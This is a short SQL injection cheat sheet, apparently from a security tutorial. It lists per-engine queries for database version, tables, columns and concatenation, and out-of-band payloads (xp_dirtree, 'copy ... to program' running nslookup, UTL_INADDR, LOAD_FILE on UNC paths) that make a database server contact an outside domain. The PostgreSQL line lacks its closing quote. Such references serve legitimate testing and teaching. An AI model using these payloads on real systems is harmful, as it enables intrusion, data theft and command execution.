Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.
Database Version Info
Oracle SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft SELECT @@version
PostgreSQL SELECT version()
MySQL SELECT @@version
Listing tables and the columns they contain:
Database Contents Info
Oracle SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'Table Name'
Microsoft SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
PostgreSQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
MySQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
Database Concatenation
Oracle 'a'||'b'
Microsoft 'a'+'b'
PostgreSQL 'a'||'b'
MySQL 'a' 'b' (space) or CONCAT('a','b')
Database Lookup Syntax
Oracle SELECT UTL_INADDR.get_host_address('domain')
- requires elevated privileges
Microsoft exec master..xp_dirtree '//domain/a'
PostgreSQL copy (SELECT '') to program 'nslookup domain
MySQL These work only on Windows LOAD_FILE('\\\\domain\\a')
SELECT ... INTO OUTFILE '\\\\domain\a'